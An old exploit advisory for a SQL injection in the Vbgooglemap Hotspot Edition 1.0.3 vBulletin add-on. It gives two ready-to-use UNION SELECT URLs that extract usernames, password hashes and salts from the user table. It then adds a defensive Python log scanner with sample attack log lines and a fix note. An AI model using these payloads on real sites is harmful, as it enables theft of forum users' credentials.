
# Title : Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
# Published : 2008-09-27
# Author : elusiven


#######################################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
#
#######################################################################

# Bug discovered by elusiven
# It was priv8

Bug: 

[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

or:

[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
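
For defenders reviewing web server logs, the following is an added example (not part of the original advisory and not the add-on's code) that flags requests to the two scripts named above whose mapid value is not a plain integer. The log format, the sample lines and the assumption that legitimate map ids are non-negative integers are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script names and the mapid parameter come from the advisory.
VULN_SCRIPTS = {"vbgooglemaphse.php", "mapa.php"}
# Assumption: Apache/nginx "combined"-style access log lines.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_HINT_RE = re.compile(r"\b(?:union|select|from)\b|--|/\*|'", re.I)

def classify_mapid(url):
    """Return None for irrelevant or benign requests, else a reason string."""
    parts = urlsplit(url)
    if parts.path.rsplit("/", 1)[-1].lower() not in VULN_SCRIPTS:
        return None
    # parse_qs decodes '+' and %XX, so encoded values are normalised first.
    for value in parse_qs(parts.query, keep_blank_values=True).get("mapid", []):
        if re.fullmatch(r"\d+", value):
            continue  # assumption: legitimate map ids are non-negative integers
        return "sql-keywords" if SQL_HINT_RE.search(value) else "non-numeric"
    return None

def scan(lines):
    """Return (client_ip, reason) for each suspicious request line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        reason = classify_mapid(match.group(1)) if match else None
        if reason:
            hits.append((line.split(" ", 1)[0], reason))
    return hits

# Constructed sample log lines (documentation IP ranges, invented paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Sep/2008:10:00:00 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Sep/2008:10:00:05 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user-- HTTP/1.1" 200 7311',
    '203.0.113.7 - - [27/Sep/2008:10:00:09 +0000] "GET /forum/mapa.php?do=showdetails&mapid=7%27 HTTP/1.1" 200 412',
    '198.51.100.4 - - [27/Sep/2008:10:01:00 +0000] "GET /forum/mapa.php?do=showdetails&mapid=12abc HTTP/1.1" 200 5120',
    '198.51.100.4 - - [27/Sep/2008:10:01:30 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

The same integer-only rule is the fix on the application side: cast or validate mapid as an integer before it reaches the query, or bind it as a parameter.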

# Special gr33tz for: my sweet Monia :*
# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT,
# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground.

#################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
#
#################################################

# www.Syue.com [2008-09-27]